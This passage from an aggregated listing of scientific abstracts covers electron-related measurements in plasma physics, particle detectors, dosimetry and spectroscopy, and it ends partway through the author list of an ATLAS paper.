below the ambient magnetic noise. Here we report the measurement of the magnetic interaction between the two ground-state spin-1/2 valence electrons of two (88)Sr(+) ions, co-trapped in an electric Paul trap. We varied the ion separation, d, between 2.18 and 2.76 micrometres and measured the electrons' weak, millihertz-scale, magnetic interaction as a function of distance, in the presence of magnetic noise that was six orders of magnitude larger than the magnetic fields the electrons apply on each other. The cooperative spin dynamics was kept coherent for 15 seconds, during which spin entanglement was generated, as verified by a negative measured value of -0.16 for the swap entanglement witness. The sensitivity necessary for this measurement was provided by restricting the spin evolution to a decoherence-free subspace that is immune to collective magnetic field noise. Our measurements show a d(-3.0(4)) distance dependence for the coupling, consistent with the inverse-cube law. 2. Precise measurement in elastic electron scattering: HAPPEX and E-158 experiments International Nuclear Information System (INIS) Vacheret, A. 2004-12-01 Parity Violation asymmetry measurements in elastic electron scattering are in one hand an interesting way of retrieving new informations about the sea quarks of the nucleon and in the other hand a powerful test of the Standard Model electroweak sector at low energy. This thesis describes the HAPPEX experiment at JLab and the E-158 experiment at SLAC (USA) which measure de parity violation asymmetries in elastic scattering of polarized electron on nuclei like Hydrogen or Helium and on atomic electrons. With the measurements on hadronic targets one can extract the strange quarks contribution to the charge and current density of the nucleon. With the electron-electron scattering one can test the standard model at the loop level and far from the Z pole by extracting sin 2 θ W . In this thesis we describe the formalism associated with the electroweak probe. We present in detail the experimental methods used to make such precise measurements of parity violation asymmetry. Then, we describe the experimental set-up of each experiment and in particular the electron detector and the feedback loop on the beam current for the HAPPEX experiment and the analysis of E-158 run III with a dedicated systematic study on the beam sub-pulse fluctuations. We present the preliminary results for each experiment with a comparison with the other existing results and the future experiments. (author) 3. Performances of Dose Measurement of Commercial Electronic Dosimeters using Geiger Muller Tube and PIN Diode Energy Technology Data Exchange (ETDEWEB) Yoo, Hyunjun; Kim, Chankyu; Kim, Yewon; Kim, Giyoon; Cho, Gyuseong [Korea Advanced Institute of Science and Technology, Daejeon (Korea, Republic of) 2014-05-15 There are two categories in personal dosimeters, one is passive type dosimeter such as TLD (thermoluminescence dosimeter) and the other is active type dosimeter such as electronic dosimeter can show radiation dose immediately while TLD needs long time to readout its data by heating process. For improving the reliability of measuring dose for any energy of radiations, electronic dosimeter uses energy filter by metal packaging its detector using aluminum or copper, but measured dose of electronic dosimeter with energy filter cannot be completely compensated in wide radiation energy region. So, in this paper, we confirmed the accuracy of dose measurement of two types of commercial EPDs using Geiger Muller tube and PIN diode with CsI(Tl) scintillator in three different energy of radiation field. The experiment results for Cs-137 was almost similar with calculation value in the results of both electronic dosimeters, but, the other experiment values with Na-22 and Co-60 had higher error comparing with Cs-137. These results were caused by optimization of their energy filters. The optimization was depending on its thickness of energy filter. So, the electronic dosimeters have to optimizing the energy filter for increasing the accuracy of dose measurement or the electronic dosimeter using PIN diode with CsI(Tl) scintillator uses the multi-channel discriminator for using its energy information. 4. Measurements of low density, high velocity flow by electron beam fluorescence technique International Nuclear Information System (INIS) Soga, Takeo; Takanishi, Masaya; Yasuhara, Michiru 1981-01-01 A low density chamber with an electron gun system was made for the measurements of low density, high velocity (high Mach number) flow. This apparatus is a continuous running facility. The number density and the rotational temperature in the underexpanding free jet of nitrogen were measured along the axis of the jet by the electron beam fluorescence technique. The measurements were carried out from the vicinity of the exit of the jet to far downstream of the first Mach disk. Rotational nonequilibrium phenomena were observed in the hypersonic flow field as well as in the shock wave (Mach disk). (author) 5. Simultaneous measurement of line electron density and Faraday rotation in the ISX-B tokamak International Nuclear Information System (INIS) Hutchinson, D.P.; Ma, C.H.; Staats, P.A.; Vander Sluis, K.L. 1981-01-01 A new diagnostic system utilizing a submillimetre-wave, phase-modulated polarimeter/interferometer has been used to simultaneously measure the time evolution of the line-averaged electron density and poloidal field-induced Faraday rotation in the ISX-B tokamak. The measurements, performed along four chords of the plasma column, have been correlated with poloidal field changes associated with a ramp in the Ohmic-heating current and by neutral-beam injection. These are the first simultaneous measurements of line electron density and Faraday rotation to be made along a chord of submillimetre laser beam in a tokamak plasma. (author) 6. Electronic circuit SG-6 type for electric differential manometer in the flow rate measuring system Energy Technology Data Exchange (ETDEWEB) Glowacki, S W; Pytel, K; Beldzikowski, W 1978-01-01 A system measuring the flow rate of a liquid or gas employing a ruft and a differential manometer needs the square rooting circuit providing the linearity of the output signal to the measured flow rate ratio. The paper describes the electronic circuit developed for this purpose. 7. Some measurements of total electron content made with the ATS-6 radio beacon International Nuclear Information System (INIS) Davies, K.; Degenhardt, W.; Hartmann, G.K. 1978-01-01 The paper deals with some measurements made with the radio beacon on board the ATS-6 satellite in the American and European sectors. Measurements of the slant electron content, the Faraday content, and the plasmaspheric (or residual) content, made under different geographic and geomagnetic conditions, are discussed and compared 8. Strain localization band width evolution by electronic speckle pattern interferometry strain rate measurement Energy Technology Data Exchange (ETDEWEB) Guelorget, Bruno [Institut Charles Delaunay-LASMIS, Universite de technologie de Troyes, FRE CNRS 2848, 12 rue Marie Curie, B.P. 2060, 10010 Troyes Cedex (France)], E-mail: [email protected]; Francois, Manuel; Montay, Guillaume [Institut Charles Delaunay-LASMIS, Universite de technologie de Troyes, FRE CNRS 2848, 12 rue Marie Curie, B.P. 2060, 10010 Troyes Cedex (France) 2009-04-15 In this paper, electronic speckle pattern interferometry strain rate measurements are used to quantify the width of the strain localization band, which occurs when a sheet specimen is submitted to tension. It is shown that the width of this band decreases with increasing strain. Just before fracture, this measured width is about five times wider than the shear band and the initial sheet thickness. 9. Effects of the light beam bending on the interferometric electron density measurements International Nuclear Information System (INIS) Matsumoto, Y.; Koyama, K.; Tanimoto, M.; Sugiura, M. 1980-01-01 In the measurements of plasma density profile with laser interferometers, the maximum relative errors due to the deflection of laser light caused by steep gradients of the electron density are analytically evaluated. As an example the errors in the measurements of density profile of a plasma focus by using a UV-N 2 laser are estimated. (author) 10. Exciton diffusion coefficient measurement in ZnO nanowires under electron beam irradiation Science.gov (United States) Donatini, Fabrice; Pernot, Julien 2018-03-01 In semiconductor nanowires (NWs) the exciton diffusion coefficient can be determined using a scanning electron microscope fitted with a cathodoluminescence system. High spatial and temporal resolution cathodoluminescence experiments are needed to measure independently the exciton diffusion length and lifetime in single NWs. However, both diffusion length and lifetime can be affected by the electron beam bombardment during observation and measurement. Thus, in this work the exciton lifetime in a ZnO NW is measured versus the electron beam dose (EBD) via a time-resolved cathodoluminescence experiment with a temporal resolution of 50 ps. The behavior of the measured exciton lifetime is consistent with our recent work on the EBD dependence of the exciton diffusion length in similar NWs investigated under comparable SEM conditions. Combining the two results, the exciton diffusion coefficient in ZnO is determined at room temperature and is found constant over the full span of EBD. 11. Program controlled system for measuring and monitoring the electron coherent radiation spectrum of Yerevan synchrotron International Nuclear Information System (INIS) Adamyan, F.V.; Vartapetyan, G.A.; Galumyan, P.I. 1980-01-01 An automatic system for measurement, processing and control of energy spectrum of polarized photons realized at the Yerevan electron synchrotron is described. For measuring energy spectra of intensive high energy photon beams a pair spectrometer is used which comprises an aluminium target-converter, an analizing magnet and 2 telescopes of scintillation counters for electron-positron pairs registration. the procedure of spectra measurement by the pair spectrometer is reduced to determining the converted e + e - pairs yield at certain values of the H field intensity of the analizing magnet. An algorithm of the data express-processing for operative monitoring of peak energy stability of electron coherent radiation spectrum is given. The spectra measurement results obtained under real experimental conditions are presented 12. Calibration of a two-color soft x-ray diagnostic for electron temperature measurement Energy Technology Data Exchange (ETDEWEB) Reusch, L. M., E-mail: [email protected]; Den Hartog, D. J.; Goetz, J.; McGarry, M. B. [University of Wisconsin - Madison, Madison, Wisconsin 53703 (United States); Franz, P. [Consorzio RFX, Padova (Italy); Stephens, H. D. [University of Wisconsin - Madison, Madison, Wisconsin 53703 (United States); Pierce College Fort Steilacoom, Lakewood, Washington 98498 (United States) 2016-11-15 The two-color soft x-ray (SXR) tomography diagnostic on the Madison Symmetric Torus is capable of making electron temperature measurements via the double-filter technique; however, there has been a 15% systematic discrepancy between the SXR double-filter (SXR{sub DF}) temperature and Thomson scattering (TS) temperature. Here we discuss calibration of the Be filters used in the SXR{sub DF} measurement using empirical measurements of the transmission function versus energy at the BESSY II electron storage ring, electron microprobe analysis of filter contaminants, and measurement of the effective density. The calibration does not account for the TS and SXR{sub DF} discrepancy, and evidence from experiments indicates that this discrepancy is due to physics missing from the SXR{sub DF} analysis rather than instrumentation effects. 13. Experimental reslts from the HERO project: In situ measurements of ionospheric modifications using sounding rockets International Nuclear Information System (INIS) Rose, G.; Grandal, B.; Neske, E.; Ott, W.; Spenner, K.; Maseide, K.; Troim, J. 1985-01-01 The Heating Rocket project HERO comprised the first in situ experiments to measure artifical ionospheric modifications at F layer heights set up by radio waves transmitted from the Heating facility at Ramfjord near Tromso in Northern Norway. Four instrumented payloads were launched on sounding rockets from Andoya Rocket Range during the autumn of 1982 into a sunlit ionosphere with the sun close to the horizon. The payloads recorded modifications, in particular, the presence of electron plasma waves near the reflection level of the heating wave. The amplitude and phase of the three components of the electric and magnetic fields of the heating wave were measured simultaneously as a function of altitude. Coherent spectra of the three electric field components of the locally generated electron plasma waves were obtained in a 50-kHz-wide band. At the same time quasi-continuous measurements were made on several fixed frequencies from 4 kHz to 16 kHz below the heating frequency and in the VLF-range using linear dipole antennas. Moreover, measurements were made of electron temperature, suprathermal electrons and local electron density along the rocket trajectory. The experimental results will be presented and discussed 14. Electron Attenuation Measurement using Cosmic Ray Muons at the MicroBooNE LArTPC Energy Technology Data Exchange (ETDEWEB) Meddage, Varuna [Kansas State U., Manhattan 2017-10-01 The MicroBooNE experiment at Fermilab uses liquid argon time projection chamber (LArTPC) technology to study neutrino interactions in argon. A fundamental requirement for LArTPCs is to achieve and maintain a low level of electronegative contaminants in the liquid to minimize the capture of drifting ionization electrons. The attenuation time for the drifting electrons should be long compared to the maximum drift time, so that the signals from particle tracks that generate ionization electrons with long drift paths can be detected efficiently. In this talk we present MicroBooNE measurement of electron attenuation using cosmic ray muons. The result yields a minimum electron 1/e lifetime of 18 ms under typical operating conditions, which is long compared to the maximum drift time of 2.3 ms. 15. Apparent increase in the thickness of superconducting particles at low temperatures measured by electron holography. Science.gov (United States) Hirsch, J E 2013-10-01 We predict that superconducting particles will show an apparent increase in thickness at low temperatures when measured by electron holography. This will result not from a real thickness increase, rather from an increase in the mean inner potential sensed by the electron wave traveling through the particle, originating in expansion of the electronic wavefunction of the superconducting electrons and resulting negative charge expulsion from the interior to the surface of the superconductor, giving rise to an increase in the phase shift of the electron wavefront going through the sample relative to the wavefront going through vacuum. The temperature dependence of the observed phase shifts will yield valuable new information on the physics of the superconducting state of metals. Copyright © 2013 Elsevier B.V. All rights reserved. 16. Electron temperature measurement by a helium line intensity ratio method in helicon plasmas International Nuclear Information System (INIS) Boivin, R.F.; Kline, J.L.; Scime, E.E. 2001-01-01 Electron temperature measurements in helicon plasmas are difficult. The presence of intense rf fields in the plasma complicates the interpretation of Langmuir probe measurements. Furthermore, the non-negligible ion temperature in the plasma considerably shortens the lifetime of conventional Langmuir probes. A spectroscopic technique based on the relative intensities of neutral helium lines is used to measure the electron temperature in the HELIX (Hot hELicon eXperiment) plasma [P. A. Keiter et al., Phys. Plasmas 4, 2741 (1997)]. This nonintrusive diagnostic is based on the fact that electron impact excitation rate coefficients for helium singlet and triplet states differ as a function of the electron temperature. The different aspects related to the validity of this technique to measure the electron temperature in rf generated plasmas are discussed in this paper. At low plasma density (n e ≤10 11 cm -3 ), this diagnostic is believed to be very reliable since the population of the emitting level can be easily estimated with reasonable accuracy by assuming that all excitation originates from the ground state (steady-state corona model). At higher density, secondary processes (excitation transfer, excitation from metastable, cascading) become more important and a more complex collisional radiative model must be used to predict the electron temperature. In this work, different helium transitions are examined and a suitable transition pair is identified. For an electron temperature of 10 eV, the line ratio is measured as a function of plasma density and compared to values predicted by models. The measured line ratio function is in good agreement with theory and the data suggest that the excitation transfer is the dominant secondary process in high-density plasmas 17. Note: Measurement of the runaway electrons in the J-TEXT tokamak International Nuclear Information System (INIS) Chen, Z. Y.; Zhang, Y.; Zhang, X. Q.; Luo, Y. H.; Jin, W.; Li, J. C.; Chen, Z. P.; Wang, Z. J.; Yang, Z. J.; Zhuang, G. 2012-01-01 The runaway electrons have been measured by hard x-ray detectors and soft x-ray array in the J-TEXT tokamak. The hard x-ray radiations in the energy ranges of 0.5-5 MeV are measured by two NaI detectors. The flux of lost runaway electrons can be obtained routinely. The soft x-ray array diagnostics are used to monitor the runaway beam generated in disruptions since the soft x-ray is dominated by the interaction between runaway electrons and metallic impurities inside the plasma. With the aid of soft x-ray array, runaway electron beam has been detected directly during the formation of runaway current plateau following the disruptions. 18. Electron-photon angular correlation measurements for the 2 1P state of helium International Nuclear Information System (INIS) Slevin, J.; Porter, H.Q.; Eminyan, M.; Defrance, A.; Vassilev, G. 1980-01-01 Electron-photon angular correlations have been measured by detecting in delayed coincidence, electrons inelastically scattered from helium and photons emitted in decays from the 2 1 P state at incident electron energies of 60 and 80 eV. Analysis of the data yields values for the ratio lambda of the differential cross sections for magnetic sublevel excitations and the phase difference X between the corresponding probability amplitudes. The measurements extend over the angular range 10-120 0 of electron scattering angles. The present data are in good agreement with the experimental results of Hollywood et al, (J. Phys. B.; 12: 819 (1979)), and show a marked discrepancy at large scattering angles with the recent data of Steph and Golde. (Phys. Rev.; A in press (1980)). The experimental results are compared with some recent theories. (author) 19. Measurements of a Newly Designed BPM for the Tevatron Electron Lens 2 Science.gov (United States) Scarpine, V. E.; Kamerdzhiev, V.; Fellenz, B.; Olson, M.; Kuznetsov, G.; Kamerdzhiev, V.; Shiltsev, V. D.; Zhang, X. L. 2006-11-01 Fermilab has developed a second electron lens (TEL-2) for beam-beam compensation in the Tevatron as part of its Run II upgrade program. Operation of the beam position monitors (BPMs) in the first electron lens (TEL-1) showed a systematic transverse position difference between short proton bunches (2 ns sigma) and long electron pulses (˜1 us) of up to ˜1.5 mm. This difference was attributed to frequency dependence in the BPM system. The TEL-2 BPMs utilize a new, compact four-plate design with grounding strips between plates to minimize crosstalk. In-situ measurements of these new BPMs are made using a stretched wire pulsed with both proton and electron beam formats. In addition, longitudinal impedance measurements of the TEL-2 are presented. Signal processing algorithm studies indicate that the frequency-dependent transverse position offset may be reduced to ˜0.1 mm for the beam structures of interest. 20. Health care quality measures for children and adolescents in Foster Care: feasibility testing in electronic records. Science.gov (United States) Deans, Katherine J; Minneci, Peter C; Nacion, Kristine M; Leonhart, Karen; Cooper, Jennifer N; Scholle, Sarah Hudson; Kelleher, Kelly J 2018-02-22 Preventive quality measures for the foster care population are largely untested. The objective of the study is to identify healthcare quality measures for young children and adolescents in foster care and to test whether the data required to calculate these measures can be feasibly extracted and interpreted within an electronic health records or within the Statewide Automated Child Welfare Information System. The AAP Recommendations for Preventive Pediatric Health Care served as the guideline for determining quality measures. Quality measures related to well child visits, developmental screenings, immunizations, trauma-related care, BMI measurements, sexually transmitted infections and depression were defined. Retrospective chart reviews were performed on a cohort of children in foster care from a single large pediatric institution and related county. Data available in the Ohio Statewide Automated Child Welfare Information System was compared to the same population studied in the electronic health record review. Quality measures were calculated as observed (received) to expected (recommended) ratios (O/E ratios) to describe the actual quantity of recommended health care that was received by individual children. Electronic health records and the Statewide Automated Child Welfare Information System data frequently lacked important information on foster care youth essential for calculating the measures. Although electronic health records were rich in encounter specific clinical data, they often lacked custodial information such as the dates of entry into and exit from foster care. In contrast, Statewide Automated Child Welfare Information System included robust data on custodial arrangements, but lacked detailed medical information. Despite these limitations, several quality measures were devised that attempted to accommodate these limitations. In this feasibility testing, neither the electronic health records at a single institution nor the county level Statewide 1. Measurements of absorbed energy distributions in water from pulsed electron beams International Nuclear Information System (INIS) Devanney, J.A. 1974-01-01 An evaluation of the use of a holographic interferometer to measure the energy deposition as a function of depth in water from pulsed electron beams, together with a brief description of the interferometer and the technique of generating a hologram are presented. The holographic interferometer is used to measure the energy deposition as a function of depth in water from various pulsed beams of monoenergetic electrons in the energy range from 1.0 to 2.5 MeV. These results are compared to those computed by using a Monte Carlo radiation transport code, ETRAN-15, for the same electron energies. After the discrepancies between the measured and computed results are evaluated, reasonable agreement is found between the measured and computed absorbed energy distributions as a function of depth in water. An evalutation of the response of the interferometer as a function of electron intensities is performed. A comparison among four energy deposition curves that result from the irradiation of water with pulsed electron beams from a Febetron accelerator, model 705, is presented. These pulsed beams were produced by the same vacuum diode with the same charging voltage. The results indicate that the energy distribution of the electrons in the pulsed beam is not always constant. A comparison of the energy deposition curves that result from the irradiation of water with electron pulses from different vacuum diodes but the same charging voltage is presented. These results indicate again that the energy distribution of the electrons in the pulsed beam may vary between vacuum diodes. These differences would not be realized by using a totally absorbing metal calorimeter and Faraday Cup 2. Note: A non-invasive electronic measurement technique to measure the embedded four resistive elements in a Wheatstone bridge sensor Energy Technology Data Exchange (ETDEWEB) Ravelo Arias, S. I.; Ramírez Muñoz, D. [Department of Electronic Engineering, University of Valencia, Avda. de la Universitat, s/n, 46100-Burjassot (Spain); Cardoso, S. [INESC Microsystems and Nanotechnologies (INESC-MN) and Institute for Nanosciences and Nanotechnologies, R. Alves Redol 9, Lisbon 1000-029 (Portugal); Ferreira, R. [INL-International Iberian Nanotechnology Laboratory, Av. Mestre José Veiga, Braga 4715-31 (Portugal); Freitas, P. [INESC Microsystems and Nanotechnologies (INESC-MN) and Institute for Nanosciences and Nanotechnologies, R. Alves Redol 9, Lisbon 1000-029 (Portugal); INL-International Iberian Nanotechnology Laboratory, Av. Mestre José Veiga, Braga 4715-31 (Portugal) 2015-06-15 The work shows a measurement technique to obtain the correct value of the four elements in a resistive Wheatstone bridge without the need to separate the physical connections existing between them. Two electronic solutions are presented, based on a source-and-measure unit and using discrete electronic components. The proposed technique brings the possibility to know the mismatching or the tolerance between the bridge resistive elements and then to pass or reject it in terms of its related common-mode rejection. Experimental results were taken in various Wheatstone resistive bridges (discrete and magnetoresistive integrated bridges) validating the proposed measurement technique specially when the bridge is micro-fabricated and there is no physical way to separate one resistive element from the others. 3. Note: A non-invasive electronic measurement technique to measure the embedded four resistive elements in a Wheatstone bridge sensor International Nuclear Information System (INIS) Ravelo Arias, S. I.; Ramírez Muñoz, D.; Cardoso, S.; Ferreira, R.; Freitas, P. 2015-01-01 The work shows a measurement technique to obtain the correct value of the four elements in a resistive Wheatstone bridge without the need to separate the physical connections existing between them. Two electronic solutions are presented, based on a source-and-measure unit and using discrete electronic components. The proposed technique brings the possibility to know the mismatching or the tolerance between the bridge resistive elements and then to pass or reject it in terms of its related common-mode rejection. Experimental results were taken in various Wheatstone resistive bridges (discrete and magnetoresistive integrated bridges) validating the proposed measurement technique specially when the bridge is micro-fabricated and there is no physical way to separate one resistive element from the others 4. Understanding the Driver of Energetic Electron Precipitation Using Coordinated Multi-Satellite Measurements Science.gov (United States) Capannolo, L.; Li, W.; Ma, Q. 2017-12-01 Electron precipitation into the upper atmosphere is one of the important loss mechanisms in the Earth's inner magnetosphere. Various magnetospheric plasma waves (i.e., chorus, plasmaspheric hiss, electromagnetic ion cyclotron waves, etc.) play an important role in scattering energetic electrons into the loss cone, thus enhance ionization in the upper atmosphere and affect ring current and radiation belt dynamics. The present study evaluates conjunction events where low-earth-orbiting satellites (twin AeroCube-6) and near-equatorial satellites (twin Van Allen Probes) are located roughly along the same magnetic field line. By analyzing electron flux variation at various energies (> 35 keV) measured by AeroCube-6 and wave and electron measurements by Van Allen Probes, together with quasilinear diffusion theory and modeling, we determine the physical process of driving the observed energetic electron precipitation for the identified electron precipitation events. Moreover, the twin AeroCube-6 also helps us understand the spatiotemporal effect and constrain the coherent size of each electron precipitation event. 5. Prototype system for proton beam range measurement based on gamma electron vertex imaging Energy Technology Data Exchange (ETDEWEB) Lee, Han Rim [Neutron Utilization Technology Division, Korea Atomic Energy Research Institute, 111, Daedeok-daero 989beon-gil, Yuseong-gu, Daejeon 34057 (Korea, Republic of); Kim, Sung Hun; Park, Jong Hoon [Department of Nuclear Engineering, Hanyang University, Seongdong-gu, Seoul 04763 (Korea, Republic of); Jung, Won Gyun [Heavy-ion Clinical Research Division, Korean Institute of Radiological & Medical Sciences, Seoul 01812 (Korea, Republic of); Lim, Hansang [Department of Electronics Convergence Engineering, Kwangwoon University, Seoul 01897 (Korea, Republic of); Kim, Chan Hyeong, E-mail: [email protected] [Department of Nuclear Engineering, Hanyang University, Seongdong-gu, Seoul 04763 (Korea, Republic of) 2017-06-11 In proton therapy, for both therapeutic effectiveness and patient safety, it is very important to accurately measure the proton dose distribution, especially the range of the proton beam. For this purpose, recently we proposed a new imaging method named gamma electron vertex imaging (GEVI), in which the prompt gammas emitting from the nuclear reactions of the proton beam in the patient are converted to electrons, and then the converted electrons are tracked to determine the vertices of the prompt gammas, thereby producing a 2D image of the vertices. In the present study, we developed a prototype GEVI system, including dedicated signal processing and data acquisition systems, which consists of a beryllium plate (= electron converter) to convert the prompt gammas to electrons, two double-sided silicon strip detectors (= hodoscopes) to determine the trajectories of those converted electrons, and a plastic scintillation detector (= calorimeter) to measure their kinetic energies. The system uses triple coincidence logic and multiple energy windows to select only the events from prompt gammas. The detectors of the prototype GEVI system were evaluated for electronic noise level, energy resolution, and time resolution. Finally, the imaging capability of the GEVI system was tested by imaging a {sup 90}Sr beta source, a {sup 60}Co gamma source, and a 45-MeV proton beam in a PMMA phantom. The overall results of the present study generally show that the prototype GEVI system can image the vertices of the prompt gammas produced by the proton nuclear interactions. 6. The effect of non-uniformities on the measured transport parameters of electron swarms in hydrogen International Nuclear Information System (INIS) Blevin, H.A.; Fletcher, J.; Hunter, S.R. 1978-01-01 Measurements of transport parameters of pulsed electron swarms moving through a low-pressure gas by observation of the photon flux resulting from electron-molecule collisions have been recently reported by Blevin et al. (J. Phys. D., 9:465, 471 and 1671 (1976)). One of the possible sources of error in this kind of experiment is the variation of mean electron energy through the swarm. This effect is considered here along with the resulting variation of ionisation and excitation frequency through the swarm. The validity of the experimental method is considered in the light of the above factors. (author) 7. Electron performance measurements with the ATLAS detector using the 2010 LHC proton-proton collision data CERN Document Server Aad, Georges; Abdallah, Jalal; Abdelalim, Ahmed Ali; Abdesselam, Abdelouahab; Abdinov, Ovsat; Abi, Babak; Abolins, Maris; Abramowicz, Halina; Abreu, Henso; Acerbi, Emilio; Acharya, Bobby Samir; Adams, David; Addy, Tetteh; Adelman, Jahred; Aderholz, Michael; Adomeit, Stefanie; Adragna, Paolo; Adye, Tim; Aefsky, Scott; Aguilar-Saavedra, Juan Antonio; Aharrouche, Mohamed; Ahlen, Steven; Ahles, Florian; Ahmad, Ashfaq; Ahsan, Mahsana; Aielli, Giulio; Akdogan, Taylan; Åkesson, Torsten Paul Ake; Akimoto, Ginga; Akimov, Andrei; Akiyama, Kunihiro; Alam, Mohammad; Alam, Muhammad Aftab; Albert, Justin; Albrand, Solveig; Aleksa, Martin; Aleksandrov, Igor; Alessandria, Franco; Alexa, Calin; Alexander, Gideon; Alexandre, Gauthier; Alexopoulos, Theodoros; Alhroob, Muhammad; Aliev, Malik; Alimonti, Gianluca; Alison, John; Aliyev, Magsud; Allport, Phillip; Allwood-Spiers, Sarah; Almond, John; Aloisio, Alberto; Alon, Raz; Alonso, Alejandro; Alviggi, Mariagrazia; Amako, Katsuya; Amaral, Pedro; Amelung, Christoph; Ammosov, Vladimir; Amorim, Antonio; Amorós, Gabriel; Amram, Nir; Anastopoulos, Christos; Ancu, Lucian Stefan; Andari, Nansi; Andeen, Timothy; Anders, Christoph Falk; Anders, Gabriel; Anderson, Kelby; Andreazza, Attilio; Andrei, George Victor; Andrieux, Marie-Laure; Anduaga, Xabier; Angerami, Aaron; Anghinolfi, Francis; Anjos, Nuno; Annovi, Alberto; Antonaki, Ariadni; Antonelli, Mario; Antonov, Alexey; Antos, Jaroslav; Anulli, Fabio; Aoun, Sahar; Aperio Bella, Ludovica; Apolle, Rudi; Arabidze, Giorgi; Aracena, Ignacio; Arai, Yasuo; Arce, Ayana; Archambault, John-Paul; Arfaoui, Samir; Arguin, Jean-Francois; Arik, Engin; Arik, Metin; Armbruster, Aaron James; Arnaez, Olivier; Arnault, Christian; Artamonov, Andrei; Artoni, Giacomo; Arutinov, David; Asai, Shoji; Asfandiyarov, Ruslan; Ask, Stefan; Åsman, Barbro; Asquith, Lily; Assamagan, Ketevi; Astbury, Alan; Astvatsatourov, Anatoli; Atoian, Grigor; Aubert, Bernard; Auerbach, Benjamin; Auge, Etienne; Augsten, Kamil; Aurousseau, Mathieu; Austin, Nicholas; Avolio, Giuseppe; Avramidou, Rachel Maria; Axen, David; Ay, Cano; Azuelos, Georges; Azuma, Yuya; Baak, Max; Baccaglioni, Giuseppe; Bacci, Cesare; Bach, Andre; Bachacou, Henri; Bachas, Konstantinos; Bachy, Gerard; Backes, Moritz; Backhaus, Malte; Badescu, Elisabeta; Bagnaia, Paolo; Bahinipati, Seema; Bai, Yu; Bailey, David; Bain, Travis; Baines, John; Baker, Oliver Keith; Baker, Mark; Baker, Sarah; Banas, Elzbieta; Banerjee, Piyali; Banerjee, Swagato; Banfi, Danilo; Bangert, Andrea Michelle; Bansal, Vikas; Bansil, Hardeep Singh; Barak, Liron; Baranov, Sergei; Barashkou, Andrei; Barbaro Galtieri, Angela; Barber, Tom; Barberio, Elisabetta Luigia; Barberis, Dario; Barbero, Marlon; Bardin, Dmitri; Barillari, Teresa; Barisonzi, Marcello; Barklow, Timothy; Barlow, Nick; Barnett, Bruce; Barnett, Michael; Baroncelli, Antonio; Barone, Gaetano; Barr, Alan; Barreiro, Fernando; Barreiro Guimarães da Costa, João; Barrillon, Pierre; Bartoldus, Rainer; Barton, Adam Edward; Bartsch, Detlef; Bartsch, Valeria; Bates, Richard; Batkova, Lucia; Batley, Richard; Battaglia, Andreas; Battistin, Michele; Battistoni, Giuseppe; Bauer, Florian; Bawa, Harinder Singh; Beare, Brian; Beau, Tristan; Beauchemin, Pierre-Hugues; Beccherle, Roberto; Bechtle, Philip; Beck, Hans Peter; Beckingham, Matthew; Becks, Karl-Heinz; Beddall, Andrew; Beddall, Ayda; Bedikian, Sourpouhi; Bednyakov, Vadim; Bee, Christopher; Begel, Michael; Behar Harpaz, Silvia; Behera, Prafulla; Beimforde, Michael; Belanger-Champagne, Camille; Bell, Paul; Bell, William; Bella, Gideon; Bellagamba, Lorenzo; Bellina, Francesco; Bellomo, Massimiliano; Belloni, Alberto; Beloborodova, Olga; Belotskiy, Konstantin; Beltramello, Olga; Ben Ami, Sagi; Benary, Odette; Benchekroun, Driss; Benchouk, Chafik; Bendel, Markus; Benekos, Nektarios; Benhammou, Yan; Benjamin, Douglas; Benoit, Mathieu; Bensinger, James; Benslama, Kamal; Bentvelsen, Stan; Berge, David; Bergeaas Kuutmann, Elin; Berger, Nicolas; Berghaus, Frank; Berglund, Elina; Beringer, Jürg; Bernardet, Karim; Bernat, Pauline; Bernhard, Ralf; Bernius, Catrin; Berry, Tracey; Bertin, Antonio; Bertinelli, Francesco; Bertolucci, Federico; Besana, Maria Ilaria; Besson, Nathalie; Bethke, Siegfried; Bhimji, Wahid; Bianchi, Riccardo-Maria; Bianco, Michele; Biebel, Otmar; Bieniek, Stephen Paul; Bierwagen, Katharina; Biesiada, Jed; Biglietti, Michela; Bilokon, Halina; Bindi, Marcello; Binet, Sebastien; Bingul, Ahmet; Bini, Cesare; Biscarat, Catherine; Bitenc, Urban; Black, Kevin; Blair, Robert; Blanchard, Jean-Baptiste; Blanchot, Georges; Blazek, Tomas; Blocker, Craig; Blocki, Jacek; Blondel, Alain; Blum, Walter; Blumenschein, Ulrike; Bobbink, Gerjan; Bobrovnikov, Victor; Bocchetta, Simona Serena; Bocci, Andrea; Boddy, Christopher Richard; Boehler, Michael; Boek, Jennifer; Boelaert, Nele; Böser, Sebastian; Bogaerts, Joannes Andreas; Bogdanchikov, Alexander; Bogouch, Andrei; Bohm, Christian; Boisvert, Veronique; Bold, Tomasz; Boldea, Venera; Bolnet, Nayanka Myriam; Bona, Marcella; Bondarenko, Valery; Boonekamp, Maarten; Boorman, Gary; Booth, Chris; Bordoni, Stefania; Borer, Claudia; Borisov, Anatoly; Borissov, Guennadi; Borjanovic, Iris; Borroni, Sara; Bos, Kors; Boscherini, Davide; Bosman, Martine; Boterenbrood, Hendrik; Botterill, David; Bouchami, Jihene; Boudreau, Joseph; Bouhova-Thacker, Evelina Vassileva; Bourdarios, Claire; Bousson, Nicolas; Boveia, Antonio; Boyd, James; Boyko, Igor; Bozhko, Nikolay; Bozovic-Jelisavcic, Ivanka; Bracinik, Juraj; Braem, André; Branchini, Paolo; Brandenburg, George; Brandt, Andrew; Brandt, Gerhard; Brandt, Oleg; Bratzler, Uwe; Brau, Benjamin; Brau, James; Braun, Helmut; Brelier, Bertrand; Bremer, Johan; Brenner, Richard; Bressler, Shikma; Breton, Dominique; Britton, Dave; Brochu, Frederic; Brock, Ian; Brock, Raymond; Brodbeck, Timothy; Brodet, Eyal; Broggi, Francesco; Bromberg, Carl; Brooijmans, Gustaaf; Brooks, William; Brown, Gareth; Brown, Heather; Bruckman de Renstrom, Pawel; Bruncko, Dusan; Bruneliere, Renaud; Brunet, Sylvie; Bruni, Alessia; Bruni, Graziano; Bruschi, Marco; Buanes, Trygve; Bucci, Francesca; Buchanan, James; Buchanan, Norman; Buchholz, Peter; Buckingham, Ryan; Buckley, Andrew; Buda, Stelian Ioan; Budagov, Ioulian; Budick, Burton; Büscher, Volker; Bugge, Lars; Buira-Clark, Daniel; Bulekov, Oleg; Bunse, Moritz; Buran, Torleiv; Burckhart, Helfried; Burdin, Sergey; Burgess, Thomas; Burke, Stephen; Busato, Emmanuel; Bussey, Peter; Buszello, Claus-Peter; Butin, François; Butler, Bart; Butler, John; Buttar, Craig; Butterworth, Jonathan; Buttinger, William; Byatt, Tom; Cabrera Urbán, Susana; Caforio, Davide; Cakir, Orhan; Calafiura, 